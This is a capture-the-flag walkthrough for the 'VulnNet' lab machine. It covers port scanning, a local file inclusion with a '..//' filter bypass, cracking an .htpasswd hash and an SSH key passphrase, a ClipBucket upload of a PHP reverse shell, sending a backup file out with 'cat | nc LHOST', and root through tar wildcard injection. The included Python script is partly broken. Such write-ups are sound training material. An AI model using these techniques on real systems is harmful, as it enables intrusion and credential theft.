Link to the ctf: VulnNet

# Nmap 7.91 scan initiated Thu Mar 18 16:30:12 2021 as: nmap -sV -sC -vv -p- -T5 -Pn -oN nmap.log vulnnet.thm
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for vulnnet.thm (
Host is up, received user-set (0.11s latency).
Scanned at 2021-03-18 16:30:13 CET for 333s
Not shown: 65533 closed ports
Reason: 65533 resets
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwkZ4lon+5ZNgVQmItwLRcbDT9QrJJGvPrfqsbAnwk4dgPz1GDjIg+RwRIZIwPGRPpyvd01W1vh0BNs7Uh9f5RVuojlLxjqsN1876Jvt5Ma7ajC49lzxmtI8B5Vmwxx9cRA8JBvENm0+BTsDjpaj3JWllRffhD25Az/F1Tz3fSua1GiR7R2eEKSMrD38+QGG22AlrCNHvunCJkPmYH9LObHq9uSZ5PbJmqR3Yl3SJarCZ6zsKBG5Ka/xJL17QUB5o6ZRHgpw/pmw+JKWUkodIwPe4hCVH0dQkfVAATjlx9JXH95h4EPmKPvZuqHZyGUPE5jPiaNg6YCNCtexw5Wo41
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA8L+SEmXtvfURdTRsmhaay/VJTFJzXYlU/0uKlPAtdpyZ8qaI55EQYPwcPMIbvyYtZM37Bypg0Uf7Sa8i1aTKk=
|   256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKNuqHl39hJpIduBG9J7QwetpgO1PWQSUDL/rvjXPiWw
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Mar 18 16:35:47 2021 -- 1 IP address (1 host up) scanned in 334.55 seconds

I didn’t find anything useful so I ran a VHOST enumeration

gobuster vhost --url http://vulnnet.thm --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt  | grep -v 'Status: 400'

I found broadcast.vulnnet.thm that requires http authentication.

In the source page http://vulnnet.thm/ we see that at the bottom of the page, it’s been imported 2 javascript files.

analyzing the javascript files using de4js we see that one of them contains a special argument to pass at http://vulnnet.thm/index.php

I tried several techinques until I realized there was a LFI (Local File Inclusion) vulnerability:

I then relized that the function deletes the ../ strings so to cirumnavigate it, I used ..//.

I created a script in python to better get the output since I didn’t want to scroll back down everytime I issue a new value.

#!/usr/bin/env python3
import requests
import sys
s = requests.Session()

if __name__ == "__main__":
    DELIMETER1 = '''                </p>


    DELIMETER2 = '<script src="/js/index__7ed54732.js"></script>'
    target = ""
    argument = ""
        target = sys.argv[1]
        argument = sys.argv[2]
        print(f"Usage: {sys.argv[0]} <ip/host> <file>")
    argument = argument.replace("../", "..//")
    print("TARGET:", target)
    print("FILE:", argument)
    r = s.get(f"http://{target}/?referer={argument}")

And I use the script ./ vulnnet.thm /etc/passwd

There is an interest line


Knowing how apache works, I wanted to find the .htpasswd file for the subdomain broadcast. The config file /etc/apache2/sites-enabled/000-default.conf shows us a lot of information about http service.

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName vulnnet.thm
        DocumentRoot /var/www/main
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
        <Directory /var/www/main>
                Order allow,deny
                allow from all

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName broadcast.vulnnet.thm
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
        <Directory /var/www/html>
                Order allow,deny
                allow from all
                AuthType Basic
                AuthName "Restricted Content"
                AuthUserFile /etc/apache2/.htpasswd
                Require valid-user

We wanna focus on the second VirtualHost, where is in charge to define the broadcast.vulnnet.thm hostname. In fact, we see the line AuthUserFile /etc/apache2/.htpasswd

Let’s get that file and try to crack the password


So we have developers as username.

I used john to do the crack and used the wordlist rockyou.txt

john -w=/usr/share/wordlists/rockyou.txt crackme.txt

Bingo, now we try to login at broadcast.vulnnet.thm.

We got a clipbucket instance.

On the Title name we see that Clipbucket is using the version 4.0.

I googled it and we found a few interesting vulnerabilities:

I used searchsploit clipbucket to look up for the vulnerability

I analyzed the last file with searchsploit -x php/webapps/44250.txt

And decided to use the following exploit:

curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/photo_uploader.php"

We re gonna create a file called lmao.php and use asio to generate a reverse shell

asio -H LHOST -P LPORT -A -B

I took the payload and put inside the lmao.php file rwapped in the php system function:

<?php system("ASIO_PAYLOAD"); ?>

and then used the curl command, being careful to add the authentication header like so:

curl -F "file=@lmao.php" -F "plupload=1" -F "name=lmao.php" -u "developers:HTPASS_PASSOWRD" "http://broadcast.vulnnet.thm/actions/photo_uploader.php"

We’re gonna get a response like this:


I opened a listener with netcat:

rlwrap nc -vlp 8080

I headed at http://broadcast.vulnnet.thm/files/, went into the photos folder and follow the path specified in the file_directory variable in the json response. We’re gonna have our file with the same name as the value of file_name. Clicking on it we get a reverse shell.

Privilege escalation - Lateral Movement

First I stabilized my shell by issuing the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

then I saw that in /var/backups/ we have ssh-backup.tar.gz -rw-rw-r-- 1 server-management server-management 1484 Jan 24 14:08 ssh-backup.tar.gz

I moved this file to my PC by opening a netcat listener in my machine

nc -lvp 8000 > "ssh-backup.tar.gz"

and send the command to my machine by issuing another command with netcat in the remote server:

cat ssh-backup.tar.gz | nc LHOST 8000

I extracted the archive by using tar:

tar xvf ssh-backup.tar.gz

NOTE: I always forget which argument pass to tar to extract the archive. Just thinking about eXtract Verbose Ffile

and we have an id_rsa. Knowing that this file is owned by server-management, I supposed that it belongs to this user. But we have to crack it first:

/usr/share/john/ id_rsa > crackme
john -w=/usr/share/wordlists/rockyou.txt crackme

and after finding the password, we can use it to login via ssh:

ssh -i id_rsa server-management@vulnnet.thm

Privilege Escalation - Vertical Movement

inside /var/opt/ we see a file called


# Where to backup to.

# What to backup. 
cd /home/server-management/Documents

# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo "Backup finished"

# Long listing of files in $dest to check file sizes.
ls -lh $dest

This file is called by cronjob after a while by using the user root

NOTE: I used to get those informations

if we focus on the tar command, we see that we have chance to use the wildcard injection

so the source directory is /home/server-management/Documents, this is the place where we have to insert our special files.

I created a file called and added it the asio reverse shell. a file called --checkpoint=1 and then --checkpoint-action=exec=sh Now we can open a netcat listener as we did before

and after a while, we should get root.